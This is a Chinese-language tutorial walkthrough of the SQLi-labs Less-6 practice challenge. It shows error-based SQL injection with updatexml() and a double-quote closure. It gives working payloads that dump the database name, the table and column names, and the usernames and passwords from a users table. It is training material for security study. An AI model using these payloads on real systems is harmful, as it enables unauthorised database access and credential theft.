首先输入id=1和id=1’未报错,均显示You are in.....(如下图所示)
由上图可以看到,如果运行返回结果正确的时候只返回you are in...,不会返回数据库当中的信息了,可以从这里知道可能跟前面less-5差不多,那么我们再尝试一下id=1”
可以看到输出结果显示错误,说明这里也是使用的报错注入的方法来显示我们想要得到的结果,但是与less-5不同的是,这里使用的是双引号,而less-5是单引号。
前面less-5我们使用的是floor函数,这里我们也可使用,所有注入语句一样,只是在less-5的基础上由单引号变成双引号即可。
这里我就不再使用floor函数了,我们来使用一个新的函数:updatexml()
首先我们来了解一下update这个函数
固定格式:updatexml(a,Xpath,b)表示在文档a中,查找 Xpath 格式的内容 替换b内容
前面less-5我们知道conact(a,b,c,…)表示用来连接括号内的字符串
我们知道了这个函数如何使用后,以我们前面的基础直接就可以开始注入啦!
爆数据库名称
输入-1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
可以看到数据库名为security
爆数据库下的表名称
输入id=-1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),0x7e),1)--+
可以看到security数据库下有4个表
爆表下的字段
输入id=-1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' ),0x7e),1)--+
可以看到表下有三个字段
爆users表里面username字段
输入id=-1" and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)--+
从上图可以看到爆出的用户名有5个。
爆users表里面password字段
输入id=-1" and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)--+
以上就是通过updatexml函数报错注入来输出我们想要的结果。